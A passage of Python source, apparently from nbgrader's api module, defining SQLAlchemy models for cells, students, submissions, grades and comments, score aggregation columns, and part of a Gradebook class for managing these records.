#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
#: A collection of grades assigned to submitted versions of this grade cell,
#: represented by :class:`~nbgrader.api.Grade` objects
grades = relationship("Grade", backref="cell")
def to_dict(self):
"""Convert the grade cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"max_score": self.max_score,
"cell_type": self.cell_type,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "GradeCell<{}/{}/{}>".format(
self.assignment.name, self.notebook.name, self.name)
class SolutionCell(Base):
__tablename__ = "solution_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the solution cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the solution cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: The :class:`~nbgrader.api.Notebook` that this solution cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.SolutionCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
#: A collection of comments assigned to submitted versions of this grade cell,
#: represented by :class:`~nbgrader.api.Comment` objects
comments = relationship("Comment", backref="cell")
def to_dict(self):
"""Convert the solution cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "{}/{}".format(self.notebook, self.name)
class SourceCell(Base):
__tablename__ = "source_cell"
__table_args__ = (UniqueConstraint('name', 'notebook_id'),)
#: Unique id of the source cell (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique human-readable name of the source cell. This need only be unique
#: within the notebook, not across notebooks.
name = Column(String(128), nullable=False)
#: The cell type, either "code" or "markdown"
cell_type = Column(Enum("code", "markdown"), nullable=False)
#: Whether the cell is locked (e.g. the source saved in the database should
#: be used to overwrite the source of students' cells)
locked = Column(Boolean, default=False, nullable=False)
#: The source code or text of the cell
source = Column(Text())
#: A checksum of the cell contents. This should usually be computed
#: using :func:`nbgrader.utils.compute_checksum`
checksum = Column(String(128))
#: The :class:`~nbgrader.api.Notebook` that this source cell is contained in
notebook = None
#: Unique id of the :attr:`~nbgrader.api.SourceCell.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: The assignment that this cell is contained within, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = association_proxy("notebook", "assignment")
def to_dict(self):
"""Convert the source cell object to a JSON-friendly dictionary
representation. Note that this includes keys for ``notebook`` and
``assignment`` which correspond to the names of the notebook and
assignment, not the objects themselves.
"""
return {
"id": self.id,
"name": self.name,
"cell_type": self.cell_type,
"locked": self.locked,
"source": self.source,
"checksum": self.checksum,
"notebook": self.notebook.name,
"assignment": self.assignment.name
}
def __repr__(self):
return "SolutionCell<{}/{}/{}>".format(
self.assignment.name, self.notebook.name, self.name)
class Student(Base):
"""Database representation of a student."""
__tablename__ = "student"
#: Unique id of the student. This could be a student ID, a username, an
#: email address, etc., so long as it is unique.
id = Column(String(128), primary_key=True, nullable=False)
#: (Optional) The first name of the student
first_name = Column(String(128))
#: (Optional) The last name of the student
last_name = Column(String(128))
#: (Optional) The student's email address, if the :attr:`~nbgrader.api.Student.id`
#: does not correspond to an email address
email = Column(String(128))
#: A collection of assignments submitted by the student, represented as
#: :class:`~nbgrader.api.SubmittedAssignment` objects
submissions = relationship("SubmittedAssignment", backref="student")
#: The overall score of the student across all assignments, computed
#: automatically from the :attr:`~nbgrader.api.SubmittedAssignment.score`
#: of each submitted assignment.
score = None
#: The maximum possible score the student could achieve across all assignments,
#: computed automatically from the :attr:`~nbgrader.api.Assignment.max_score`
#: of each assignment.
max_score = None
def to_dict(self):
"""Convert the student object to a JSON-friendly dictionary
representation.
"""
return {
"id": self.id,
"first_name": self.first_name,
"last_name": self.last_name,
"email": self.email,
"score": self.score,
"max_score": self.max_score
}
def __repr__(self):
return "Student<{}>".format(self.id)
class SubmittedAssignment(Base):
"""Database representation of an assignment submitted by a student."""
__tablename__ = "submitted_assignment"
__table_args__ = (UniqueConstraint('assignment_id', 'student_id'),)
#: Unique id of the submitted assignment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Name of the assignment, inherited from :class:`~nbgrader.api.Assignment`
name = association_proxy("assignment", "name")
#: The master version of this assignment, represented by a
#: :class:`~nbgrader.api.Assignment` object
assignment = None
#: Unique id of :attr:`~nbgrader.api.SubmittedAssignment.assignment`
assignment_id = Column(String(32), ForeignKey('assignment.id'))
#: The student who submitted this assignment, represented by a
#: :class:`~nbgrader.api.Student` object
student = None
#: Unique id of :attr:`~nbgrader.api.SubmittedAssignment.student`
student_id = Column(String(128), ForeignKey('student.id'))
#: (Optional) The date and time that the assignment was submitted, in date
#: time format with a UTC timezone
timestamp = Column(DateTime())
#: (Optional) An extension given to the student for this assignment, in
#: time delta format
extension = Column(Interval())
#: A collection of notebooks contained within this submitted assignment,
#: represented by :class:`~nbgrader.api.SubmittedNotebook` objects
notebooks = relationship("SubmittedNotebook", backref="assignment")
#: The score assigned to this assignment, automatically calculated from the
#: :attr:`~nbgrader.api.SubmittedNotebook.score` of each notebook within
#: this submitted assignment.
score = None
#: The maximum possible score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_score = None
#: The code score assigned to this assignment, automatically calculated from
#: the :attr:`~nbgrader.api.SubmittedNotebook.code_score` of each notebook
#: within this submitted assignment.
code_score = None
#: The maximum possible code score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_code_score = None
#: The written score assigned to this assignment, automatically calculated
#: from the :attr:`~nbgrader.api.SubmittedNotebook.written_score` of each
#: notebook within this submitted assignment.
written_score = None
#: The maximum possible written score of this assignment, inherited from
#: :class:`~nbgrader.api.Assignment`
max_written_score = None
#: Whether this assignment has parts that need to be manually graded,
#: automatically determined from the :attr:`~nbgrader.api.SubmittedNotebook.needs_manual_grade`
#: attribute of each notebook.
needs_manual_grade = None
@property
def duedate(self):
"""The duedate of this student's assignment, which includes any extension
given, if applicable, and which is just the regular assignment duedate
otherwise.
"""
orig_duedate = self.assignment.duedate
if self.extension is not None:
return orig_duedate + self.extension
else:
return orig_duedate
@property
def total_seconds_late(self):
"""The number of seconds that this assignment was turned in past the
duedate (including extensions, if any). If the assignment was turned in
before the deadline, this value will just be zero.
"""
if self.timestamp is None or self.duedate is None:
return 0
else:
return max(0, (self.timestamp - self.duedate).total_seconds())
def to_dict(self):
"""Convert the submitted assignment object to a JSON-friendly dictionary
representation. Note that this includes a ``student`` key which is the
unique id of the student, not the object itself.
"""
return {
"id": self.id,
"name": self.name,
"student": self.student.id,
"timestamp": self.timestamp.isoformat() if self.timestamp is not None else None,
"extension": self.extension.total_seconds() if self.extension is not None else None,
"duedate": self.duedate.isoformat() if self.duedate is not None else None,
"total_seconds_late": self.total_seconds_late,
"score": self.score,
"max_score": self.max_score,
"code_score": self.code_score,
"max_code_score": self.max_code_score,
"written_score": self.written_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade
}
def __repr__(self):
return "SubmittedAssignment<{} for {}>".format(self.name, self.student.id)
class SubmittedNotebook(Base):
"""Database representation of a notebook submitted by a student."""
__tablename__ = "submitted_notebook"
__table_args__ = (UniqueConstraint('notebook_id', 'assignment_id'),)
#: Unique id of the submitted notebook (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Name of the notebook, inherited from :class:`~nbgrader.api.Notebook`
name = association_proxy("notebook", "name")
#: The submitted assignment this notebook is a part of, represented by a
#: :class:`~nbgrader.api.SubmittedAssignment` object
assignment = None
#: Unique id of :attr:`~nbgrader.api.SubmittedNotebook.assignment`
assignment_id = Column(String(32), ForeignKey('submitted_assignment.id'))
#: The master version of this notebook, represesnted by a
#: :class:`~nbgrader.api.Notebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.SubmittedNotebook.notebook`
notebook_id = Column(String(32), ForeignKey('notebook.id'))
#: Collection of grades associated with this submitted notebook, represented
#: by :class:`~nbgrader.api.Grade` objects
grades = relationship("Grade", backref="notebook")
#: Collection of comments associated with this submitted notebook, represented
#: by :class:`~nbgrader.api.Comment` objects
comments = relationship("Comment", backref="notebook")
#: The student who submitted this notebook, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('assignment', 'student')
#: Whether this assignment has been flagged by a human grader
flagged = Column(Boolean, default=False)
#: The score assigned to this notebook, automatically calculated from the
#: :attr:`~nbgrader.api.Grade.score` of each grade cell within
#: this submitted notebook.
score = None
#: The maximum possible score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_score = None
#: The code score assigned to this notebook, automatically calculated from
#: the :attr:`~nbgrader.api.Grade.score` and :attr:`~nbgrader.api.GradeCell.cell_type`
#: of each grade within this submitted notebook.
code_score = None
#: The maximum possible code score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_code_score = None
#: The written score assigned to this notebook, automatically calculated from
#: the :attr:`~nbgrader.api.Grade.score` and :attr:`~nbgrader.api.GradeCell.cell_type`
#: of each grade within this submitted notebook.
written_score = None
#: The maximum possible written score of this notebook, inherited from
#: :class:`~nbgrader.api.Notebook`
max_written_score = None
#: Whether this notebook has parts that need to be manually graded,
#: automatically determined from the :attr:`~nbgrader.api.Grade.needs_manual_grade`
#: attribute of each grade.
needs_manual_grade = None
#: Whether this notebook contains autograder tests that failed to pass,
#: automatically determined from the :attr:`~nbgrader.api.Grade.failed_tests`
#: attribute of each grade.
failed_tests = None
def to_dict(self):
"""Convert the submitted notebook object to a JSON-friendly dictionary
representation. Note that this includes a key for ``student`` which is
the unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"student": self.student.id,
"score": self.score,
"max_score": self.max_score,
"code_score": self.code_score,
"max_code_score": self.max_code_score,
"written_score": self.written_score,
"max_written_score": self.max_written_score,
"needs_manual_grade": self.needs_manual_grade,
"failed_tests": self.failed_tests,
"flagged": self.flagged
}
def __repr__(self):
return "SubmittedNotebook<{}/{} for {}>".format(
self.assignment.name, self.name, self.student.id)
class Grade(Base):
"""Database representation of a grade assigned to the submitted version of
a grade cell.
"""
__tablename__ = "grade"
__table_args__ = (UniqueConstraint('cell_id', 'notebook_id'),)
#: Unique id of the grade (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique name of the grade cell, inherited from :class:`~nbgrader.api.GradeCell`
name = association_proxy('cell', 'name')
#: The submitted assignment that this grade is contained in, represented by
#: a :class:`~nbgrader.api.SubmittedAssignment` object
assignment = association_proxy('notebook', 'assignment')
#: The submitted notebook that this grade is assigned to, represented by a
#: :class:`~nbgrader.api.SubmittedNotebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.Grade.notebook`
notebook_id = Column(String(32), ForeignKey('submitted_notebook.id'))
#: The master version of the cell this grade is assigned to, represented by
#: a :class:`~nbgrader.api.GradeCell` object.
cell = None
#: Unique id of :attr:`~nbgrader.api.Grade.cell`
cell_id = Column(String(32), ForeignKey('grade_cell.id'))
#: The type of cell this grade corresponds to, inherited from
#: :class:`~nbgrader.api.GradeCell`
cell_type = None
#: The student who this grade is assigned to, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('notebook', 'student')
#: Score assigned by the autograder
auto_score = Column(Float())
#: Score assigned by a human grader
manual_score = Column(Float())
#: Whether a score needs to be assigned manually. This is True by default.
needs_manual_grade = Column(Boolean, default=True, nullable=False)
#: The overall score, computed automatically from the
#: :attr:`~nbgrader.api.Grade.auto_score` and :attr:`~nbgrader.api.Grade.manual_score`
#: values. If neither are set, the score is zero. If both are set, then the
#: manual score takes precedence. If only one is set, then that value is used
#: for the score.
score = column_property(case(
[
(manual_score != None, manual_score),
(auto_score != None, auto_score)
],
else_=literal_column("0.0")
))
#: The maximum possible score that can be assigned, inherited from
#: :class:`~nbgrader.api.GradeCell`
max_score = None
#: Whether the autograded score is a result of failed autograder tests. This
#: is True if the autograder score is zero and the cell type is "code", and
#: otherwise False.
failed_tests = None
def to_dict(self):
"""Convert the grade object to a JSON-friendly dictionary representation.
Note that this includes keys for ``notebook`` and ``assignment`` which
correspond to the name of the notebook and assignment, not the actual
objects. It also includes a key for ``student`` which corresponds to the
unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name,
"student": self.student.id,
"auto_score": self.auto_score,
"manual_score": self.manual_score,
"max_score": self.max_score,
"needs_manual_grade": self.needs_manual_grade,
"failed_tests": self.failed_tests,
"cell_type": self.cell_type
}
def __repr__(self):
return "Grade<{}/{}/{} for {}>".format(
self.assignment.name, self.notebook.name, self.name, self.student.id)
class Comment(Base):
"""Database representation of a comment on a cell in a submitted notebook."""
__tablename__ = "comment"
__table_args__ = (UniqueConstraint('cell_id', 'notebook_id'),)
#: Unique id of the comment (automatically generated)
id = Column(String(32), primary_key=True, default=new_uuid)
#: Unique name of the solution cell, inherited from :class:`~nbgrader.api.SolutionCell`
name = association_proxy('cell', 'name')
#: The submitted assignment that this comment is contained in, represented by
#: a :class:`~nbgrader.api.SubmittedAssignment` object
assignment = association_proxy('notebook', 'assignment')
#: The submitted notebook that this comment is assigned to, represented by a
#: :class:`~nbgrader.api.SubmittedNotebook` object
notebook = None
#: Unique id of :attr:`~nbgrader.api.Comment.notebook`
notebook_id = Column(String(32), ForeignKey('submitted_notebook.id'))
#: The master version of the cell this comment is assigned to, represented by
#: a :class:`~nbgrader.api.SolutionCell` object.
cell = None
#: Unique id of :attr:`~nbgrader.api.Comment.cell`
cell_id = Column(String(32), ForeignKey('solution_cell.id'))
#: The student who this comment is assigned to, represented by a
#: :class:`~nbgrader.api.Student` object
student = association_proxy('notebook', 'student')
#: A comment which is automatically assigned by the autograder
auto_comment = Column(Text())
#: A commment which is assigned manually
manual_comment = Column(Text())
#: The overall comment, computed automatically from the
#: :attr:`~nbgrader.api.Comment.auto_comment` and
#: :attr:`~nbgrader.api.Comment.manual_comment` values. If neither are set,
#: the comment is None. If both are set, then the manual comment
#: takes precedence. If only one is set, then that value is used for the
#: comment.
comment = column_property(case(
[
(manual_comment != None, manual_comment),
(auto_comment != None, auto_comment)
],
else_=None
))
def to_dict(self):
"""Convert the comment object to a JSON-friendly dictionary representation.
Note that this includes keys for ``notebook`` and ``assignment`` which
correspond to the name of the notebook and assignment, not the actual
objects. It also includes a key for ``student`` which corresponds to the
unique id of the student, not the actual student object.
"""
return {
"id": self.id,
"name": self.name,
"notebook": self.notebook.name,
"assignment": self.assignment.name,
"student": self.student.id,
"auto_comment": self.auto_comment,
"manual_comment": self.manual_comment
}
def __repr__(self):
return "Comment<{}/{}/{} for {}>".format(
self.assignment.name, self.notebook.name, self.name, self.student.id)
## Needs manual grade
SubmittedNotebook.needs_manual_grade = column_property(
exists().where(and_(
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.needs_manual_grade = column_property(
exists().where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
Notebook.needs_manual_grade = column_property(
exists().where(and_(
Notebook.id == SubmittedNotebook.notebook_id,
Grade.notebook_id == SubmittedNotebook.id,
Grade.needs_manual_grade))\
.correlate_except(Grade), deferred=True)
## Overall scores
SubmittedNotebook.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(Grade.notebook_id == SubmittedNotebook.id)\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id))\
.correlate_except(Grade), deferred=True)
Student.score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedAssignment.student_id == Student.id,
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id))\
.correlate_except(Grade), deferred=True)
## Overall max scores
Grade.max_score = column_property(
select([GradeCell.max_score])\
.where(Grade.cell_id == GradeCell.id)\
.correlate_except(GradeCell), deferred=True)
Notebook.max_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(GradeCell.notebook_id == Notebook.id)\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_score = column_property(
select([Notebook.max_score])\
.where(SubmittedNotebook.notebook_id == Notebook.id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_score = column_property(
select([Assignment.max_score])\
.where(SubmittedAssignment.assignment_id == Assignment.id)\
.correlate_except(Assignment), deferred=True)
Student.max_score = column_property(
select([func.coalesce(func.sum(Assignment.max_score), 0.0)])\
.correlate_except(Assignment), deferred=True)
## Written scores
SubmittedNotebook.written_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "markdown"))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.written_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "markdown"))\
.correlate_except(Grade), deferred=True)
## Written max scores
Notebook.max_written_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "markdown"))\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_written_score = column_property(
select([Notebook.max_written_score])\
.where(Notebook.id == SubmittedNotebook.notebook_id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_written_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "markdown"))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_written_score = column_property(
select([Assignment.max_written_score])\
.where(Assignment.id == SubmittedAssignment.assignment_id)\
.correlate_except(Assignment), deferred=True)
## Code scores
SubmittedNotebook.code_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "code"))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.code_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "code"))\
.correlate_except(Grade), deferred=True)
## Code max scores
Notebook.max_code_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "code"))\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_code_score = column_property(
select([Notebook.max_code_score])\
.where(Notebook.id == SubmittedNotebook.notebook_id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_code_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "code"))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_code_score = column_property(
select([Assignment.max_code_score])\
.where(Assignment.id == SubmittedAssignment.assignment_id)\
.correlate_except(Assignment), deferred=True)
## Number of submissions
Assignment.num_submissions = column_property(
select([func.count(SubmittedAssignment.id)])\
.where(SubmittedAssignment.assignment_id == Assignment.id)\
.correlate_except(SubmittedAssignment), deferred=True)
Notebook.num_submissions = column_property(
select([func.count(SubmittedNotebook.id)])\
.where(SubmittedNotebook.notebook_id == Notebook.id)\
.correlate_except(SubmittedNotebook), deferred=True)
## Cell type
Grade.cell_type = column_property(
select([GradeCell.cell_type])\
.where(Grade.cell_id == GradeCell.id)\
.correlate_except(GradeCell), deferred=True)
## Failed tests
Grade.failed_tests = column_property(
(Grade.auto_score < Grade.max_score) & (Grade.cell_type == "code"))
SubmittedNotebook.failed_tests = column_property(
exists().where(and_(
Grade.notebook_id == SubmittedNotebook.id,
Grade.failed_tests))\
.correlate_except(Grade), deferred=True)
class Gradebook(object):
"""The gradebook object to interface with the database holding
nbgrader grades.
"""
def __init__(self, db_url):
"""Initialize the connection to the database.
Parameters
----------
db_url : string
The URL to the database, e.g. ``sqlite:///grades.db``
"""
# create the connection to the database
engine = create_engine(db_url)
self.db = scoped_session(sessionmaker(autoflush=True, bind=engine))
# this creates all the tables in the database if they don't already exist
Base.metadata.create_all(bind=engine)
#### Students
@property
def students(self):
"""A list of all students in the database."""
return self.db.query(Student)\
.order_by(Student.last_name, Student.first_name)\
.all()
def add_student(self, student_id, **kwargs):
"""Add a new student to the database.
Parameters
----------
student_id : string
The unique id of the student
`**kwargs` : dict
other keyword arguments to the :class:`~nbgrader.api.Student` object
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
student = Student(id=student_id, **kwargs)
self.db.add(student)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return student
def find_student(self, student_id):
"""Find a student.
Parameters
----------
student_id : string
The unique id of the student
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
try:
student = self.db.query(Student)\
.filter(Student.id == student_id)\
.one()
except NoResultFound:
raise MissingEntry("No such student: {}".format(student_id))
return student
def update_or_create_student(self, name, **kwargs):
"""Update an existing student, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the student
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Student` object
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
try:
student = self.find_student(name)
except MissingEntry:
student = self.add_student(name, **kwargs)
else:
for attr in kwargs:
setattr(student, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return student
def remove_student(self, name):
"""Deletes an existing student from the gradebook, including any
submissions the might be associated with that student.
Parameters
----------
name : string
the name of the student to delete
"""
student = self.find_student(name)
for submission in student.submissions:
self.remove_submission(submission.assignment.name, name)
self.db.delete(student)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Assignments
@property
def assignments(self):
"""A list of all assignments in the gradebook."""
return self.db.query(Assignment)\
.order_by(Assignment.duedate, Assignment.name)\
.all()
def add_assignment(self, name, **kwargs):
"""Add a new assignment to the gradebook.
Parameters
----------
name : string
the unique name of the new assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Assignment` object
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
if 'duedate' in kwargs:
kwargs['duedate'] = utils.parse_utc(kwargs['duedate'])
assignment = Assignment(name=name, **kwargs)
self.db.add(assignment)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return assignment
def find_assignment(self, name):
"""Find an assignment in the gradebook.
Parameters
----------
name : string
the unique name of the assignment
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
try:
assignment = self.db.query(Assignment)\
.filter(Assignment.name == name)\
.one()
except NoResultFound:
raise MissingEntry("No such assignment: {}".format(name))
return assignment
def update_or_create_assignment(self, name, **kwargs):
"""Update an existing assignment, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Assignment` object
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
try:
assignment = self.find_assignment(name)
except MissingEntry:
assignment = self.add_assignment(name, **kwargs)
else:
for attr in kwargs:
if attr == 'duedate':
setattr(assignment, attr, utils.parse_utc(kwargs[attr]))
else:
setattr(assignment, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return assignment
def remove_assignment(self, name):
"""Deletes an existing assignment from the gradebook, including any
submissions the might be associated with that assignment.
Parameters
----------
name : string
the name of the assignment to delete
"""
assignment = self.find_assignment(name)
for submission in assignment.submissions:
self.remove_submission(name, submission.student.id)
for notebook in assignment.notebooks:
self.remove_notebook(notebook.name, name)
self.db.delete(assignment)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Notebooks
def add_notebook(self, name, assignment, **kwargs):
"""Add a new notebook to an assignment.
Parameters
----------
name : string
the name of the new notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Notebook` object
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
notebook = Notebook(
name=name, assignment=self.find_assignment(assignment), **kwargs)
self.db.add(notebook)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return notebook
def find_notebook(self, name, assignment):
"""Find a particular notebook in an assignment.
Parameters
----------
name : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
try:
notebook = self.db.query(Notebook)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(Notebook.name == name, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such notebook: {}/{}".format(assignment, name))
return notebook
def update_or_create_notebook(self, name, assignment, **kwargs):
"""Update an existing notebook, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Notebook` object
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
try:
notebook = self.find_notebook(name, assignment)
except MissingEntry:
notebook = self.add_notebook(name, assignment, **kwargs)
else:
for attr in kwargs:
setattr(notebook, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return notebook
def remove_notebook(self, name, assignment):
"""Deletes an existing notebook from the gradebook, including any
submissions the might be associated with that notebook.
Parameters
----------
name : string
the name of the notebook to delete
assignment : string
the name of an existing assignment
"""
notebook = self.find_notebook(name, assignment)
for submission in notebook.submissions:
self.remove_submission_notebook(name, assignment, submission.student.id)
for grade_cell in notebook.grade_cells:
self.db.delete(grade_cell)
for solution_cell in notebook.solution_cells:
self.db.delete(solution_cell)
for source_cell in notebook.source_cells:
self.db.delete(source_cell)
self.db.delete(notebook)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Grade cells
def add_grade_cell(self, name, notebook, assignment, **kwargs):
"""Add a new grade cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new grade cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.GradeCell`
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
notebook = self.find_notebook(notebook, assignment)
grade_cell = GradeCell(name=name, notebook=notebook, **kwargs)
self.db.add(grade_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return grade_cell
def find_grade_cell(self, name, notebook, assignment):
"""Find a grade cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the grade cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
try:
grade_cell = self.db.query(GradeCell)\
.join(Notebook, Notebook.id == GradeCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(
GradeCell.name == name,
Notebook.name == notebook,
Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such grade cell: {}/{}/{}".format(assignment, notebook, name))
return grade_cell
def update_or_create_grade_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing grade cell in a notebook of an assignment, or
create the grade cell if it does not exist.
Parameters
----------
name : string
the name of the grade cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.GradeCell`
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
try:
grade_cell = self.find_grade_cell(name, notebook, assignment)
except MissingEntry:
grade_cell = self.add_grade_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(grade_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return grade_cell
#### Solution cells
def add_solution_cell(self, name, notebook, assignment, **kwargs):
"""Add a new solution cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new solution cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SolutionCell`
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
